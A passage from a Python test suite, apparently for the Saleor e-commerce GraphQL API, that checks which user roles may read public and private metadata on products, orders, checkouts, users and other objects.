collection.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
collection.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_COLLECTION_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_DIGITAL_CONTENT_PUBLIC_META = """
query digitalContentMeta($id: ID!){
digitalContent(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_digital_content_as_anonymous_user(
api_client, digital_content
):
# given
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = api_client.post_graphql(QUERY_DIGITAL_CONTENT_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_digital_content_as_customer(
user_api_client, digital_content
):
# given
digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
digital_content.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = user_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PUBLIC_META, variables
)
# then
assert_no_permission(response)
def test_query_public_meta_for_digital_content_as_staff(
staff_api_client, digital_content, permission_manage_products
):
# given
digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
digital_content.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["digitalContent"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_digital_content_as_service_account(
service_account_api_client, digital_content, permission_manage_products
):
# given
digital_content.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
digital_content.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("DigitalContent", digital_content.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_DIGITAL_CONTENT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["digitalContent"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_PRODUCT_PUBLIC_META = """
query productsMeta($id: ID!){
product(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_as_anonymous_user(api_client, product):
# given
product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_as_customer(user_api_client, product):
# given
product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = user_api_client.post_graphql(QUERY_PRODUCT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_as_staff(
staff_api_client, product, permission_manage_products
):
# given
product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_as_service_account(
service_account_api_client, product, permission_manage_products
):
# given
product.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("Product", product.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["product"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_PRODUCT_TYPE_PUBLIC_META = """
query productTypeMeta($id: ID!){
productType(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_type_as_anonymous_user(api_client, product_type):
# given
product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product_type.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_TYPE_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_type_as_customer(user_api_client, product_type):
# given
product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product_type.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = user_api_client.post_graphql(QUERY_PRODUCT_TYPE_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_type_as_staff(
staff_api_client, product_type, permission_manage_products
):
# given
product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product_type.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_TYPE_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_type_as_service_account(
service_account_api_client, product_type, permission_manage_products
):
# given
product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
product_type.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductType", product_type.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_TYPE_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productType"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_PRODUCT_VARIANT_PUBLIC_META = """
query productVariantMeta($id: ID!){
productVariant(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_variant_as_anonymous_user(api_client, variant):
# given
variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
variant.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = api_client.post_graphql(QUERY_PRODUCT_VARIANT_PUBLIC_META, variables)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_variant_as_customer(user_api_client, variant):
# given
variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
variant.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = user_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PUBLIC_META, variables
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_variant_as_staff(
staff_api_client, variant, permission_manage_products
):
# given
variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
variant.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_product_variant_as_service_account(
service_account_api_client, variant, permission_manage_products
):
# given
variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
variant.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ProductVariant", variant.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_PRODUCT_VARIANT_PUBLIC_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["productVariant"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_SERVICE_ACCOUNT_PUBLIC_META = """
query serviceAccountMeta($id: ID!){
serviceAccount(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_service_account_as_anonymous_user(
api_client, service_account
):
# given
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = api_client.post_graphql(QUERY_SERVICE_ACCOUNT_PUBLIC_META, variables)
# then
assert_no_permission(response)
def test_query_public_meta_for_service_account_as_customer(
user_api_client, service_account
):
# given
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = user_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PUBLIC_META, variables
)
# then
assert_no_permission(response)
def test_query_public_meta_for_service_account_as_staff(
staff_api_client, service_account, permission_manage_service_accounts
):
# given
service_account.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
service_account.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PUBLIC_META,
variables,
[permission_manage_service_accounts],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["serviceAccount"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
def test_query_public_meta_for_service_account_as_service_account(
service_account_api_client, service_account, permission_manage_service_accounts
):
# given
service_account.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
service_account.save(update_fields=["metadata"])
variables = {"id": graphene.Node.to_global_id("ServiceAccount", service_account.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_SERVICE_ACCOUNT_PUBLIC_META,
variables,
[permission_manage_service_accounts],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["serviceAccount"]["metadata"][0]
assert metadata["key"] == PUBLIC_KEY
assert metadata["value"] == PUBLIC_VALUE
QUERY_SELF_PRIVATE_META = """
{
me{
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_me_as_customer(user_api_client):
# given
# when
response = user_api_client.post_graphql(QUERY_SELF_PRIVATE_META)
# then
assert_no_permission(response)
def test_query_private_meta_for_me_as_staff_with_manage_customer(
staff_api_client, permission_manage_users
):
# given
# when
response = staff_api_client.post_graphql(
QUERY_SELF_PRIVATE_META, None, [permission_manage_users]
)
# then
assert_no_permission(response)
def test_query_private_meta_for_me_as_staff_with_manage_staff(
staff_api_client, permission_manage_staff
):
# given
me = staff_api_client.user
me.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
me.save(update_fields=["private_metadata"])
# when
response = staff_api_client.post_graphql(
QUERY_SELF_PRIVATE_META, None, [permission_manage_staff]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["me"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_USER_PRIVATE_META = """
query userMeta($id: ID!){
user(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_customer_as_staff(
staff_api_client, permission_manage_users, customer_user
):
# given
customer_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
customer_user.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("User", customer_user.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_USER_PRIVATE_META, variables, [permission_manage_users]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_customer_as_service_account(
service_account_api_client, permission_manage_users, customer_user
):
# given
customer_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
customer_user.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("User", customer_user.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_USER_PRIVATE_META, variables, [permission_manage_users]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_staff_as_other_staff(
staff_api_client, permission_manage_staff, admin_user
):
# given
admin_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
admin_user.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("User", admin_user.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_USER_PRIVATE_META, variables, [permission_manage_staff]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_staff_as_service_account(
service_account_api_client, permission_manage_staff, admin_user
):
# given
admin_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
admin_user.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("User", admin_user.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_USER_PRIVATE_META, variables, [permission_manage_staff]
)
content = get_graphql_content(response)
# then
metadata = content["data"]["user"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_CHECKOUT_PRIVATE_META = """
query checkoutMeta($token: UUID!){
checkout(token: $token){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_checkout_as_anonymous_user(api_client, checkout):
# given
variables = {"token": checkout.pk}
# when
response = api_client.post_graphql(QUERY_CHECKOUT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_other_customer_checkout_as_anonymous_user(
api_client, checkout, customer_user
):
# given
checkout.user = customer_user
checkout.save(update_fields=["user"])
variables = {"token": checkout.pk}
# when
response = api_client.post_graphql(QUERY_CHECKOUT_PRIVATE_META, variables)
content = get_graphql_content(response)
# then
assert not content["data"]["checkout"]
def test_query_private_meta_for_checkout_as_customer(user_api_client, checkout):
# given
checkout.user = user_api_client.user
checkout.save(update_fields=["user"])
variables = {"token": checkout.pk}
# when
response = user_api_client.post_graphql(QUERY_CHECKOUT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_checkout_as_staff(
staff_api_client, checkout, customer_user, permission_manage_checkouts
):
# given
checkout.user = customer_user
checkout.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
checkout.save(update_fields=["user", "private_metadata"])
variables = {"token": checkout.pk}
# when
response = staff_api_client.post_graphql(
QUERY_CHECKOUT_PRIVATE_META,
variables,
[permission_manage_checkouts],
check_no_permissions=False, # Remove after fix #5245
)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_checkout_as_service_account(
service_account_api_client, checkout, customer_user, permission_manage_checkouts
):
# given
checkout.user = customer_user
checkout.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
checkout.save(update_fields=["user", "private_metadata"])
variables = {"token": checkout.pk}
# when
response = service_account_api_client.post_graphql(
QUERY_CHECKOUT_PRIVATE_META,
variables,
[permission_manage_checkouts],
check_no_permissions=False, # Remove after fix #5245
)
content = get_graphql_content(response)
# then
metadata = content["data"]["checkout"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_ORDER_BY_TOKEN_PRIVATE_META = """
query orderMeta($token: UUID!){
orderByToken(token: $token){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_order_by_token_as_anonymous_user(api_client, order):
# given
variables = {"token": order.token}
# when
response = api_client.post_graphql(QUERY_ORDER_BY_TOKEN_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_order_by_token_as_customer(user_api_client, order):
# given
order.user = user_api_client.user
order.save(update_fields=["user"])
variables = {"token": order.token}
# when
response = user_api_client.post_graphql(
QUERY_ORDER_BY_TOKEN_PRIVATE_META, variables
)
# then
assert_no_permission(response)
def test_query_private_meta_for_order_by_token_as_staff(
staff_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
order.save(update_fields=["user", "private_metadata"])
variables = {"token": order.token}
# when
response = staff_api_client.post_graphql(
QUERY_ORDER_BY_TOKEN_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_order_by_token_as_service_account(
service_account_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
order.save(update_fields=["user", "private_metadata"])
variables = {"token": order.token}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_BY_TOKEN_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_ORDER_PRIVATE_META = """
query orderMeta($id: ID!){
order(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_order_as_anonymous_user(api_client, order):
# given
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = api_client.post_graphql(QUERY_ORDER_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_order_as_customer(user_api_client, order):
# given
order.user = user_api_client.user
order.save(update_fields=["user"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = user_api_client.post_graphql(QUERY_ORDER_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_order_as_staff(
staff_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
order.save(update_fields=["user", "private_metadata"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_ORDER_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_order_as_service_account(
service_account_api_client, order, customer_user, permission_manage_orders
):
# given
order.user = customer_user
order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
order.save(update_fields=["user", "private_metadata"])
variables = {"id": graphene.Node.to_global_id("Order", order.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_DRAFT_ORDER_PRIVATE_META = """
query draftOrderMeta($id: ID!){
order(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_draft_order_as_anonymous_user(api_client, draft_order):
# given
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = api_client.post_graphql(QUERY_DRAFT_ORDER_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_draft_order_as_customer(user_api_client, draft_order):
# given
draft_order.user = user_api_client.user
draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
draft_order.save(update_fields=["user", "private_metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = user_api_client.post_graphql(QUERY_DRAFT_ORDER_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_draft_order_as_staff(
staff_api_client, draft_order, customer_user, permission_manage_orders
):
# given
draft_order.user = customer_user
draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
draft_order.save(update_fields=["user", "private_metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_DRAFT_ORDER_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_draft_order_as_service_account(
service_account_api_client, draft_order, customer_user, permission_manage_orders
):
# given
draft_order.user = customer_user
draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
draft_order.save(update_fields=["user", "private_metadata"])
variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ORDER_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["order"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_FULFILLMENT_PRIVATE_META = """
query fulfillmentMeta($token: UUID!){
orderByToken(token: $token){
fulfillments{
privateMetadata{
key
value
}
}
}
}
"""
def test_query_private_meta_for_fulfillment_as_anonymous_user(
api_client, fulfilled_order
):
# given
variables = {"token": fulfilled_order.token}
# when
response = api_client.post_graphql(QUERY_FULFILLMENT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_fulfillment_as_customer(
user_api_client, fulfilled_order
):
# given
fulfilled_order.user = user_api_client.user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = user_api_client.post_graphql(QUERY_FULFILLMENT_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_fulfillment_as_staff(
staff_api_client, fulfilled_order, customer_user, permission_manage_orders
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
fulfillment.save(update_fields=["private_metadata"])
fulfilled_order.user = customer_user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = staff_api_client.post_graphql(
QUERY_FULFILLMENT_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_fulfillment_as_service_account(
service_account_api_client, fulfilled_order, customer_user, permission_manage_orders
):
# given
fulfillment = fulfilled_order.fulfillments.first()
fulfillment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
fulfillment.save(update_fields=["private_metadata"])
fulfilled_order.user = customer_user
fulfilled_order.save(update_fields=["user"])
variables = {"token": fulfilled_order.token}
# when
response = service_account_api_client.post_graphql(
QUERY_FULFILLMENT_PRIVATE_META,
variables,
[permission_manage_orders],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["orderByToken"]["fulfillments"][0]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_ATTRIBUTE_PRIVATE_META = """
query attributeMeta($id: ID!){
attribute(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_attribute_as_anonymous_user(
api_client, color_attribute
):
# given
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = api_client.post_graphql(QUERY_ATTRIBUTE_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_attribute_as_customer(user_api_client, color_attribute):
# given
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = user_api_client.post_graphql(QUERY_ATTRIBUTE_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_attribute_as_staff(
staff_api_client, color_attribute, permission_manage_products
):
# given
color_attribute.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
color_attribute.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_ATTRIBUTE_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_attribute_as_service_account(
service_account_api_client, color_attribute, permission_manage_products
):
# given
color_attribute.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
color_attribute.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Attribute", color_attribute.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_ATTRIBUTE_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["attribute"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_CATEGORY_PRIVATE_META = """
query categoryMeta($id: ID!){
category(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_category_as_anonymous_user(api_client, category):
# given
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = api_client.post_graphql(QUERY_CATEGORY_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_category_as_customer(user_api_client, category):
# given
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = user_api_client.post_graphql(QUERY_CATEGORY_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_category_as_staff(
staff_api_client, category, permission_manage_products
):
# given
category.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
category.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_CATEGORY_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_category_as_service_account(
service_account_api_client, category, permission_manage_products
):
# given
category.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
category.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Category", category.pk)}
# when
response = service_account_api_client.post_graphql(
QUERY_CATEGORY_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["category"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
QUERY_COLLECTION_PRIVATE_META = """
query collectionMeta($id: ID!){
collection(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_collection_as_anonymous_user(api_client, collection):
# given
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = api_client.post_graphql(QUERY_COLLECTION_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_collection_as_customer(user_api_client, collection):
# given
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = user_api_client.post_graphql(QUERY_COLLECTION_PRIVATE_META, variables)
# then
assert_no_permission(response)
def test_query_private_meta_for_collection_as_staff(
staff_api_client, collection, permission_manage_products
):
# given
collection.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
collection.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = staff_api_client.post_graphql(
QUERY_COLLECTION_PRIVATE_META,
variables,
[permission_manage_products],
check_no_permissions=False,
)
content = get_graphql_content(response)
# then
metadata = content["data"]["collection"]["privateMetadata"][0]
assert metadata["key"] == PRIVATE_KEY
assert metadata["value"] == PRIVATE_VALUE
def test_query_private_meta_for_collection_as_service_account(
service_account_api_client, collection, permission_manage_products
):
# given
collection.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
collection.save(update_fields=["private_metadata"])
variables = {"id": graphene.Node.to_global_id("Collection", collection.pk)}
# when
response = service_account_api_client.post_graphql(
